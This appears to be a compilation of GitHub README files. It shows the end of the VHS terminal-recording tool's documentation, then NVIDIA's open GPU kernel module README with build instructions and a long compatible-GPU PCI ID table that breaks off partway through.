Type "echo $HELLO"
Enter
Sleep 1s
```

### Source

The `Source` command allows you to execute commands from another tape.

```elixir
Source config.tape
```

***

## Continuous Integration

You can hook up VHS to your CI pipeline to keep your GIFs up-to-date with the official VHS GitHub Action:

> [⚙️ charmbracelet/vhs-action](https://github.com/charmbracelet/vhs-action)

VHS can also be used for integration testing. Use the `.txt` or `.ascii` output to generate golden files. Store these files in a git repository to ensure there are no diffs between runs of the tape file.

```elixir
Output golden.ascii
```

## Syntax Highlighting

There's a tree-sitter grammar for `.tape` files available for editors that support syntax highlighting with tree-sitter:

> [🌳 charmbracelet/tree-sitter-vhs](https://github.com/charmbracelet/tree-sitter-vhs)

It works great with Neovim, Emacs, and so on!

## Feedback

We'd love to hear your thoughts on this project. Feel free to drop us a note!

* [Twitter](https://twitter.com/charmcli)
* [The Fediverse](https://mastodon.social/@charmcli)
* [Discord](https://charm.sh/chat)

## License

[MIT](https://github.com/charmbracelet/vhs/raw/main/LICENSE)

***

Part of [Charm](https://charm.sh).

<a href="https://charm.sh/"> <img alt="The Charm logo" width="400" src="https://stuff.charm.sh/charm-badge.jpg" /> </a>

Charm热爱开源 • Charm loves open source
Your CLI home video recorder 📼
gif,recording,terminal,video,cli,command-line,ascii,vhs
11
47
279
636
71
13
5
NVIDIA/open-gpu-kernel-modules
# NVIDIA Linux Open GPU Kernel Module Source This is the source release of the NVIDIA Linux open GPU kernel modules, version 550.90.07. ## How to Build To build: make modules -j$(nproc) To install, first uninstall any existing NVIDIA kernel modules. Then, as root: make modules_install -j$(nproc) Note that the kernel modules built here must be used with GSP firmware and user-space NVIDIA GPU driver components from a corresponding 550.90.07 driver release. This can be achieved by installing the NVIDIA GPU driver from the .run file using the `--no-kernel-modules` option. E.g., sh ./NVIDIA-Linux-[...].run --no-kernel-modules ## Supported Target CPU Architectures Currently, the kernel modules can be built for x86_64 or aarch64. If cross-compiling, set these variables on the make command line: TARGET_ARCH=aarch64|x86_64 CC LD AR CXX OBJCOPY E.g., # compile on x86_64 for aarch64 make modules -j$(nproc) \ TARGET_ARCH=aarch64 \ CC=aarch64-linux-gnu-gcc \ LD=aarch64-linux-gnu-ld \ AR=aarch64-linux-gnu-ar \ CXX=aarch64-linux-gnu-g++ \ OBJCOPY=aarch64-linux-gnu-objcopy ## Other Build Knobs NV_VERBOSE - Set this to "1" to print each complete command executed; otherwise, a succinct "CC" line is printed. DEBUG - Set this to "1" to build the kernel modules as debug. By default, the build compiles without debugging information. This also enables various debug log messages in the kernel modules. These variables can be set on the make command line. E.g., make modules -j$(nproc) NV_VERBOSE=1 ## Supported Toolchains Any reasonably modern version of GCC or Clang can be used to build the kernel modules. Note that the kernel interface layers of the kernel modules must be built with the toolchain that was used to build the kernel. ## Supported Linux Kernel Versions The NVIDIA open kernel modules support the same range of Linux kernel versions that are supported with the proprietary NVIDIA kernel modules. This is currently Linux kernel 3.10 or newer. ## How to Contribute Contributions can be made by creating a pull request on https://github.com/NVIDIA/open-gpu-kernel-modules We'll respond via GitHub. Note that when submitting a pull request, you will be prompted to accept a Contributor License Agreement. This code base is shared with NVIDIA's proprietary drivers, and various processing is performed on the shared code to produce the source code that is published here. This has several implications for the foreseeable future: * The GitHub repository will function mostly as a snapshot of each driver release. * We do not expect to be able to provide revision history for individual changes that were made to NVIDIA's shared code base. There will likely only be one git commit per driver release. * We may not be able to reflect individual contributions as separate git commits in the GitHub repository. * Because the code undergoes various processing prior to publishing here, contributions made here require manual merging to be applied to the shared code base. Therefore, large refactoring changes made here may be difficult to merge and accept back into the shared code base. If you have large refactoring to suggest, please contact us in advance, so we can coordinate. ## How to Report Issues Problems specific to the Open GPU Kernel Modules can be reported in the Issues section of the https://github.com/NVIDIA/open-gpu-kernel-modules repository. 
Further, any of the existing bug reporting venues can be used to communicate problems to NVIDIA, such as our forum:

https://forums.developer.nvidia.com/c/gpu-graphics/linux/148

or linux-bugs@nvidia.com.

Please see the 'NVIDIA Contact Info and Additional Resources' section of the NVIDIA GPU Driver README for details.

Please see the separate [SECURITY.md](SECURITY.md) document if you believe you have discovered a security vulnerability in this software.

## Kernel Interface and OS-Agnostic Components of Kernel Modules

Most of NVIDIA's kernel modules are split into two components:

* An "OS-agnostic" component: this is the component of each kernel module that is independent of operating system.

* A "kernel interface layer": this is the component of each kernel module that is specific to the Linux kernel version and configuration.

When packaged in the NVIDIA .run installation package, the OS-agnostic component is provided as a binary: it is large and time-consuming to compile, so pre-built versions are provided so that the user does not have to compile it during every driver installation. For the nvidia.ko kernel module, this component is named "nv-kernel.o_binary". For the nvidia-modeset.ko kernel module, this component is named "nv-modeset-kernel.o_binary". Neither nvidia-drm.ko nor nvidia-uvm.ko have OS-agnostic components.

The kernel interface layer component for each kernel module must be built for the target kernel.

## Directory Structure Layout

- `kernel-open/` The kernel interface layer
- `kernel-open/nvidia/` The kernel interface layer for nvidia.ko
- `kernel-open/nvidia-drm/` The kernel interface layer for nvidia-drm.ko
- `kernel-open/nvidia-modeset/` The kernel interface layer for nvidia-modeset.ko
- `kernel-open/nvidia-uvm/` The kernel interface layer for nvidia-uvm.ko
- `src/` The OS-agnostic code
- `src/nvidia/` The OS-agnostic code for nvidia.ko
- `src/nvidia-modeset/` The OS-agnostic code for nvidia-modeset.ko
- `src/common/` Utility code used by one or more of nvidia.ko and nvidia-modeset.ko
- `nouveau/` Tools for integration with the Nouveau device driver

## Nouveau device driver integration

The Python script in the 'nouveau' directory is used to extract some of the firmware binary images (and related data) encoded in the source code and store them as distinct files. These files are used by the Nouveau device driver to load and communicate with the GSP firmware.

The layout of the binary files is described in nouveau_firmware_layout.ods, which is an OpenDocument Spreadsheet file, compatible with most spreadsheet software applications.

## Compatible GPUs

The NVIDIA open kernel modules can be used on any Turing or later GPU (see the table below). However, in the 550.90.07 release, GeForce and Workstation support is considered to be Beta quality. The open kernel modules are suitable for broad usage, and NVIDIA requests feedback on any issues encountered specific to them.

For details on feature support and limitations, see the NVIDIA GPU driver end user README here:

https://us.download.nvidia.com/XFree86/Linux-x86_64/550.90.07/README/kernel_open.html

For vGPU support, please refer to the README.vgpu packaged in the vGPU Host Package for more details.

In the below table, if three IDs are listed, the first is the PCI Device ID, the second is the PCI Subsystem Vendor ID, and the third is the PCI Subsystem Device ID.
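As a convenience for cross-checking this table, the IDs of the GPUs in a given system can be read with `lspci` (a sketch, not part of NVIDIA's instructions; note that `lspci` prints hex IDs in lowercase while the table uses uppercase):

```sh
# PCI Device IDs of all NVIDIA devices, shown as [10de:<device>], e.g. [10de:1e04]
lspci -nn -d 10de:

# Include the "Subsystem:" line, which carries the Subsystem Vendor and Device IDs
lspci -vnn -d 10de: | grep -iE 'nvidia|subsystem'
```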
| Product Name | PCI ID | | ----------------------------------------------- | -------------- | | NVIDIA TITAN RTX | 1E02 | | NVIDIA GeForce RTX 2080 Ti | 1E04 | | NVIDIA GeForce RTX 2080 Ti | 1E07 | | Quadro RTX 6000 | 1E30 | | Quadro RTX 8000 | 1E30 1028 129E | | Quadro RTX 8000 | 1E30 103C 129E | | Quadro RTX 8000 | 1E30 10DE 129E | | Quadro RTX 6000 | 1E36 | | Quadro RTX 8000 | 1E78 10DE 13D8 | | Quadro RTX 6000 | 1E78 10DE 13D9 | | NVIDIA GeForce RTX 2080 SUPER | 1E81 | | NVIDIA GeForce RTX 2080 | 1E82 | | NVIDIA GeForce RTX 2070 SUPER | 1E84 | | NVIDIA GeForce RTX 2080 | 1E87 | | NVIDIA GeForce RTX 2060 | 1E89 | | NVIDIA GeForce RTX 2080 | 1E90 | | NVIDIA GeForce RTX 2080 with Max-Q Design | 1E90 1025 1375 | | NVIDIA GeForce RTX 2080 with Max-Q Design | 1E90 1028 08A1 | | NVIDIA GeForce RTX 2080 with Max-Q Design | 1E90 1028 08A2 | | NVIDIA GeForce RTX 2080 with Max-Q Design | 1E90 1028 08EA | | NVIDIA GeForce RTX 2080 with Max-Q Design | 1E90 1028 08EB | | NVIDIA GeForce RTX 2080 with Max-Q Design | 1E90 1028 08EC | | NVIDIA GeForce RTX 2080 with Max-Q Design | 1E90 1028 08ED | | NVIDIA GeForce RTX 2080 with Max-Q Design | 1E90 1028 08EE | | NVIDIA GeForce RTX 2080 with Max-Q Design | 1E90 1028 08EF | | NVIDIA GeForce RTX 2080 with Max-Q Design | 1E90 1028 093B | | NVIDIA GeForce RTX 2080 with Max-Q Design | 1E90 1028 093C | | NVIDIA GeForce RTX 2080 with Max-Q Design | 1E90 103C 8572 | | NVIDIA GeForce RTX 2080 with Max-Q Design | 1E90 103C 8573 | | NVIDIA GeForce RTX 2080 with Max-Q Design | 1E90 103C 8602 | | NVIDIA GeForce RTX 2080 with Max-Q Design | 1E90 103C 8606 | | NVIDIA GeForce RTX 2080 with Max-Q Design | 1E90 103C 86C6 | | NVIDIA GeForce RTX 2080 with Max-Q Design | 1E90 103C 86C7 | | NVIDIA GeForce RTX 2080 with Max-Q Design | 1E90 103C 87A6 | | NVIDIA GeForce RTX 2080 with Max-Q Design | 1E90 103C 87A7 | | NVIDIA GeForce RTX 2080 with Max-Q Design | 1E90 1043 131F | | NVIDIA GeForce RTX 2080 with Max-Q Design | 1E90 1043 137F | | NVIDIA GeForce RTX 2080 with Max-Q Design | 1E90 1043 141F | | NVIDIA GeForce RTX 2080 with Max-Q Design | 1E90 1043 1751 | | NVIDIA GeForce RTX 2080 with Max-Q Design | 1E90 1458 1660 | | NVIDIA GeForce RTX 2080 with Max-Q Design | 1E90 1458 1661 | | NVIDIA GeForce RTX 2080 with Max-Q Design | 1E90 1458 1662 | | NVIDIA GeForce RTX 2080 with Max-Q Design | 1E90 1458 75A6 | | NVIDIA GeForce RTX 2080 with Max-Q Design | 1E90 1458 75A7 | | NVIDIA GeForce RTX 2080 with Max-Q Design | 1E90 1458 86A6 | | NVIDIA GeForce RTX 2080 with Max-Q Design | 1E90 1458 86A7 | | NVIDIA GeForce RTX 2080 with Max-Q Design | 1E90 1462 1274 | | NVIDIA GeForce RTX 2080 with Max-Q Design | 1E90 1462 1277 | | NVIDIA GeForce RTX 2080 with Max-Q Design | 1E90 152D 1220 | | NVIDIA GeForce RTX 2080 with Max-Q Design | 1E90 1558 95E1 | | NVIDIA GeForce RTX 2080 with Max-Q Design | 1E90 1558 97E1 | | NVIDIA GeForce RTX 2080 with Max-Q Design | 1E90 1A58 2002 | | NVIDIA GeForce RTX 2080 with Max-Q Design | 1E90 1A58 2005 | | NVIDIA GeForce RTX 2080 with Max-Q Design | 1E90 1A58 2007 | | NVIDIA GeForce RTX 2080 with Max-Q Design | 1E90 1A58 3000 | | NVIDIA GeForce RTX 2080 with Max-Q Design | 1E90 1A58 3001 | | NVIDIA GeForce RTX 2080 with Max-Q Design | 1E90 1D05 1069 | | NVIDIA GeForce RTX 2070 Super | 1E91 | | NVIDIA GeForce RTX 2070 Super with Max-Q Design | 1E91 103C 8607 | | NVIDIA GeForce RTX 2070 Super with Max-Q Design | 1E91 103C 8736 | | NVIDIA GeForce RTX 2070 Super with Max-Q Design | 1E91 103C 8738 | | NVIDIA GeForce RTX 2070 Super with Max-Q Design | 1E91 103C 
8772 | | NVIDIA GeForce RTX 2070 Super with Max-Q Design | 1E91 103C 878A | | NVIDIA GeForce RTX 2070 Super with Max-Q Design | 1E91 103C 878B | | NVIDIA GeForce RTX 2070 Super with Max-Q Design | 1E91 1043 1E61 | | NVIDIA GeForce RTX 2070 Super with Max-Q Design | 1E91 1458 1511 | | NVIDIA GeForce RTX 2070 Super with Max-Q Design | 1E91 1458 75B3 | | NVIDIA GeForce RTX 2070 Super with Max-Q Design | 1E91 1458 75B4 | | NVIDIA GeForce RTX 2070 Super with Max-Q Design | 1E91 1458 76B2 | | NVIDIA GeForce RTX 2070 Super with Max-Q Design | 1E91 1458 76B3 | | NVIDIA GeForce RTX 2070 Super with Max-Q Design | 1E91 1458 78A2 | | NVIDIA GeForce RTX 2070 Super with Max-Q Design | 1E91 1458 78A3 | | NVIDIA GeForce RTX 2070 Super with Max-Q Design | 1E91 1458 86B2 | | NVIDIA GeForce RTX 2070 Super with Max-Q Design | 1E91 1458 86B3 | | NVIDIA GeForce RTX 2070 Super with Max-Q Design | 1E91 1462 12AE | | NVIDIA GeForce RTX 2070 Super with Max-Q Design | 1E91 1462 12B0 | | NVIDIA GeForce RTX 2070 Super with Max-Q Design | 1E91 1462 12C6 | | NVIDIA GeForce RTX 2070 Super with Max-Q Design | 1E91 17AA 22C3 | | NVIDIA GeForce RTX 2070 Super with Max-Q Design | 1E91 17AA 22C5 | | NVIDIA GeForce RTX 2070 Super with Max-Q Design | 1E91 1A58 2009 | | NVIDIA GeForce RTX 2070 Super with Max-Q Design | 1E91 1A58 200A | | NVIDIA GeForce RTX 2070 Super with Max-Q Design | 1E91 1A58 3002 | | NVIDIA GeForce RTX 2070 Super with Max-Q Design | 1E91 8086 3012 | | NVIDIA GeForce RTX 2080 Super | 1E93 | | NVIDIA GeForce RTX 2080 Super with Max-Q Design | 1E93 1025 1401 | | NVIDIA GeForce RTX 2080 Super with Max-Q Design | 1E93 1025 149C | | NVIDIA GeForce RTX 2080 Super with Max-Q Design | 1E93 1028 09D2 | | NVIDIA GeForce RTX 2080 Super with Max-Q Design | 1E93 103C 8607 | | NVIDIA GeForce RTX 2080 Super with Max-Q Design | 1E93 103C 86C7 | | NVIDIA GeForce RTX 2080 Super with Max-Q Design | 1E93 103C 8736 | | NVIDIA GeForce RTX 2080 Super with Max-Q Design | 1E93 103C 8738 | | NVIDIA GeForce RTX 2080 Super with Max-Q Design | 1E93 103C 8772 | | NVIDIA GeForce RTX 2080 Super with Max-Q Design | 1E93 103C 87A6 | | NVIDIA GeForce RTX 2080 Super with Max-Q Design | 1E93 103C 87A7 | | NVIDIA GeForce RTX 2080 Super with Max-Q Design | 1E93 1458 75B1 | | NVIDIA GeForce RTX 2080 Super with Max-Q Design | 1E93 1458 75B2 | | NVIDIA GeForce RTX 2080 Super with Max-Q Design | 1E93 1458 76B0 | | NVIDIA GeForce RTX 2080 Super with Max-Q Design | 1E93 1458 76B1 | | NVIDIA GeForce RTX 2080 Super with Max-Q Design | 1E93 1458 78A0 | | NVIDIA GeForce RTX 2080 Super with Max-Q Design | 1E93 1458 78A1 | | NVIDIA GeForce RTX 2080 Super with Max-Q Design | 1E93 1458 86B0 | | NVIDIA GeForce RTX 2080 Super with Max-Q Design | 1E93 1458 86B1 | | NVIDIA GeForce RTX 2080 Super with Max-Q Design | 1E93 1462 12AE | | NVIDIA GeForce RTX 2080 Super with Max-Q Design | 1E93 1462 12B0 | | NVIDIA GeForce RTX 2080 Super with Max-Q Design | 1E93 1462 12B4 | | NVIDIA GeForce RTX 2080 Super with Max-Q Design | 1E93 1462 12C6 | | NVIDIA GeForce RTX 2080 Super with Max-Q Design | 1E93 1558 50D3 | | NVIDIA GeForce RTX 2080 Super with Max-Q Design | 1E93 1558 70D1 | | NVIDIA GeForce RTX 2080 Super with Max-Q Design | 1E93 17AA 22C3 | | NVIDIA GeForce RTX 2080 Super with Max-Q Design | 1E93 17AA 22C5 | | NVIDIA GeForce RTX 2080 Super with Max-Q Design | 1E93 1A58 2009 | | NVIDIA GeForce RTX 2080 Super with Max-Q Design | 1E93 1A58 200A | | NVIDIA GeForce RTX 2080 Super with Max-Q Design | 1E93 1A58 3002 | | NVIDIA GeForce RTX 2080 Super with Max-Q Design | 1E93 
1D05 1089 | | Quadro RTX 5000 | 1EB0 | | Quadro RTX 4000 | 1EB1 | | Quadro RTX 5000 | 1EB5 | | Quadro RTX 5000 with Max-Q Design | 1EB5 1025 1375 | | Quadro RTX 5000 with Max-Q Design | 1EB5 1025 1401 | | Quadro RTX 5000 with Max-Q Design | 1EB5 1025 149C | | Quadro RTX 5000 with Max-Q Design | 1EB5 1028 09C3 | | Quadro RTX 5000 with Max-Q Design | 1EB5 103C 8736 | | Quadro RTX 5000 with Max-Q Design | 1EB5 103C 8738 | | Quadro RTX 5000 with Max-Q Design | 1EB5 103C 8772 | | Quadro RTX 5000 with Max-Q Design | 1EB5 103C 8780 | | Quadro RTX 5000 with Max-Q Design | 1EB5 103C 8782 | | Quadro RTX 5000 with Max-Q Design | 1EB5 103C 8783 | | Quadro RTX 5000 with Max-Q Design | 1EB5 103C 8785 | | Quadro RTX 5000 with Max-Q Design | 1EB5 1043 1DD1 | | Quadro RTX 5000 with Max-Q Design | 1EB5 1462 1274 | | Quadro RTX 5000 with Max-Q Design | 1EB5 1462 12B0 | | Quadro RTX 5000 with Max-Q Design | 1EB5 1462 12C6 | | Quadro RTX 5000 with Max-Q Design | 1EB5 17AA 22B8 | | Quadro RTX 5000 with Max-Q Design | 1EB5 17AA 22BA | | Quadro RTX 5000 with Max-Q Design | 1EB5 1A58 2005 | | Quadro RTX 5000 with Max-Q Design | 1EB5 1A58 2007 | | Quadro RTX 5000 with Max-Q Design | 1EB5 1A58 2008 | | Quadro RTX 5000 with Max-Q Design | 1EB5 1A58 200A | | Quadro RTX 4000 | 1EB6 | | Quadro RTX 4000 with Max-Q Design | 1EB6 1028 09C3 | | Quadro RTX 4000 with Max-Q Design | 1EB6 103C 8736 | | Quadro RTX 4000 with Max-Q Design | 1EB6 103C 8738 | | Quadro RTX 4000 with Max-Q Design | 1EB6 103C 8772 | | Quadro RTX 4000 with Max-Q Design | 1EB6 103C 8780 | | Quadro RTX 4000 with Max-Q Design | 1EB6 103C 8782 | | Quadro RTX 4000 with Max-Q Design | 1EB6 103C 8783 | | Quadro RTX 4000 with Max-Q Design | 1EB6 103C 8785 | | Quadro RTX 4000 with Max-Q Design | 1EB6 1462 1274 | | Quadro RTX 4000 with Max-Q Design | 1EB6 1462 1277 | | Quadro RTX 4000 with Max-Q Design | 1EB6 1462 12B0 | | Quadro RTX 4000 with Max-Q Design | 1EB6 1462 12C6 | | Quadro RTX 4000 with Max-Q Design | 1EB6 17AA 22B8 | | Quadro RTX 4000 with Max-Q Design | 1EB6 17AA 22BA | | NVIDIA GeForce RTX 2070 SUPER | 1EC2 | | NVIDIA GeForce RTX 2070 SUPER | 1EC7 | | NVIDIA GeForce RTX 2080 | 1ED0 | | NVIDIA GeForce RTX 2080 with Max-Q Design | 1ED0 1025 132D | | NVIDIA GeForce RTX 2080 with Max-Q Design | 1ED0 1028 08ED | | NVIDIA GeForce RTX 2080 with Max-Q Design | 1ED0 1028 08EE | | NVIDIA GeForce RTX 2080 with Max-Q Design | 1ED0 1028 08EF | | NVIDIA GeForce RTX 2080 with Max-Q Design | 1ED0 103C 8572 | | NVIDIA GeForce RTX 2080 with Max-Q Design | 1ED0 103C 8573 | | NVIDIA GeForce RTX 2080 with Max-Q Design | 1ED0 103C 8600 | | NVIDIA GeForce RTX 2080 with Max-Q Design | 1ED0 103C 8605 | | NVIDIA GeForce RTX 2080 with Max-Q Design | 1ED0 1043 138F | | NVIDIA GeForce RTX 2080 with Max-Q Design | 1ED0 1043 15C1 | | NVIDIA GeForce RTX 2080 with Max-Q Design | 1ED0 17AA 3FEE | | NVIDIA GeForce RTX 2080 with Max-Q Design | 1ED0 17AA 3FFE | | NVIDIA GeForce RTX 2070 Super | 1ED1 | | NVIDIA GeForce RTX 2070 Super with Max-Q Design | 1ED1 1025 1432 | | NVIDIA GeForce RTX 2070 Super with Max-Q Design | 1ED1 103C 8746 | | NVIDIA GeForce RTX 2070 Super with Max-Q Design | 1ED1 103C 878A | | NVIDIA GeForce RTX 2070 Super with Max-Q Design | 1ED1 1043 165F | | NVIDIA GeForce RTX 2070 Super with Max-Q Design | 1ED1 144D C192 | | NVIDIA GeForce RTX 2070 Super with Max-Q Design | 1ED1 17AA 3FCE | | NVIDIA GeForce RTX 2070 Super with Max-Q Design | 1ED1 17AA 3FCF | | NVIDIA GeForce RTX 2070 Super with Max-Q Design | 1ED1 17AA 3FD0 | | NVIDIA GeForce RTX 2080 Super | 1ED3 | | 
NVIDIA GeForce RTX 2080 Super with Max-Q Design | 1ED3 1025 1432 | | NVIDIA GeForce RTX 2080 Super with Max-Q Design | 1ED3 1028 09D1 | | NVIDIA GeForce RTX 2080 Super with Max-Q Design | 1ED3 103C 8746 | | NVIDIA GeForce RTX 2080 Super with Max-Q Design | 1ED3 103C 878A | | NVIDIA GeForce RTX 2080 Super with Max-Q Design | 1ED3 1043 1D61 | | NVIDIA GeForce RTX 2080 Super with Max-Q Design | 1ED3 1043 1E51 | | NVIDIA GeForce RTX 2080 Super with Max-Q Design | 1ED3 1043 1F01 | | NVIDIA GeForce RTX 2080 Super with Max-Q Design | 1ED3 17AA 3FCE | | NVIDIA GeForce RTX 2080 Super with Max-Q Design | 1ED3 17AA 3FCF | | NVIDIA GeForce RTX 2080 Super with Max-Q Design | 1ED3 17AA 3FD0 | | Quadro RTX 5000 | 1EF5 | | NVIDIA GeForce RTX 2070 | 1F02 | | NVIDIA GeForce RTX 2060 | 1F03 | | NVIDIA GeForce RTX 2060 SUPER | 1F06 | | NVIDIA GeForce RTX 2070 | 1F07 | | NVIDIA GeForce RTX 2060 | 1F08 | | NVIDIA GeForce GTX 1650 | 1F0A | | NVIDIA GeForce RTX 2070 | 1F10 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F10 1025 132D | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F10 1025 1342 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F10 1028 08A1 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F10 1028 08A2 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F10 1028 08EA | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F10 1028 08EB | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F10 1028 08EC | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F10 1028 08ED | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F10 1028 08EE | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F10 1028 08EF | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F10 1028 093B | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F10 1028 093C | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F10 103C 8572 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F10 103C 8573 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F10 103C 8602 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F10 103C 8606 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F10 1043 132F | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F10 1043 136F | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F10 1043 1881 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F10 1043 1E6E | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F10 1458 1658 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F10 1458 1663 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F10 1458 1664 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F10 1458 75A4 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F10 1458 75A5 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F10 1458 86A4 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F10 1458 86A5 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F10 1462 1274 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F10 1462 1277 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F10 1558 95E1 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F10 1558 97E1 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F10 1A58 2002 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F10 1A58 2005 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F10 1A58 2007 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F10 1A58 3000 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F10 1A58 3001 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F10 1D05 105E | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F10 1D05 1070 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F10 1D05 2087 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F10 8086 2087 | | NVIDIA GeForce RTX 2060 | 1F11 | | NVIDIA GeForce RTX 2060 | 1F12 
| | NVIDIA GeForce RTX 2060 with Max-Q Design | 1F12 1028 098F | | NVIDIA GeForce RTX 2060 with Max-Q Design | 1F12 103C 8741 | | NVIDIA GeForce RTX 2060 with Max-Q Design | 1F12 103C 8744 | | NVIDIA GeForce RTX 2060 with Max-Q Design | 1F12 103C 878E | | NVIDIA GeForce RTX 2060 with Max-Q Design | 1F12 103C 880E | | NVIDIA GeForce RTX 2060 with Max-Q Design | 1F12 1043 1E11 | | NVIDIA GeForce RTX 2060 with Max-Q Design | 1F12 1043 1F11 | | NVIDIA GeForce RTX 2060 with Max-Q Design | 1F12 1462 12D9 | | NVIDIA GeForce RTX 2060 with Max-Q Design | 1F12 17AA 3801 | | NVIDIA GeForce RTX 2060 with Max-Q Design | 1F12 17AA 3802 | | NVIDIA GeForce RTX 2060 with Max-Q Design | 1F12 17AA 3803 | | NVIDIA GeForce RTX 2070 | 1F14 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F14 1025 1401 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F14 1025 1432 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F14 1025 1442 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F14 1025 1446 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F14 1025 147D | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F14 1028 09E2 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F14 1028 09F3 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F14 103C 8607 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F14 103C 86C6 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F14 103C 86C7 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F14 103C 8736 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F14 103C 8738 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F14 103C 8746 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F14 103C 8772 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F14 103C 878A | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F14 103C 878B | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F14 103C 87A6 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F14 103C 87A7 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F14 1043 174F | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F14 1458 1512 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F14 1458 75B5 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F14 1458 75B6 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F14 1458 76B4 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F14 1458 76B5 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F14 1458 78A4 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F14 1458 78A5 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F14 1458 86B4 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F14 1458 86B5 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F14 1462 12AE | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F14 1462 12B0 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F14 1462 12C6 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F14 1558 50D3 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F14 1558 70D1 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F14 1A58 200C | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F14 1A58 2011 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F14 1A58 3002 | | NVIDIA GeForce RTX 2060 | 1F15 | | Quadro RTX 3000 | 1F36 | | Quadro RTX 3000 with Max-Q Design | 1F36 1028 0990 | | Quadro RTX 3000 with Max-Q Design | 1F36 103C 8736 | | Quadro RTX 3000 with Max-Q Design | 1F36 103C 8738 | | Quadro RTX 3000 with Max-Q Design | 1F36 103C 8772 | | Quadro RTX 3000 with Max-Q Design | 1F36 1043 13CF | | Quadro RTX 3000 with Max-Q Design | 1F36 1414 0032 | | NVIDIA GeForce RTX 2060 SUPER | 1F42 | | NVIDIA GeForce RTX 2060 SUPER | 1F47 | | NVIDIA GeForce RTX 2070 | 1F50 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 
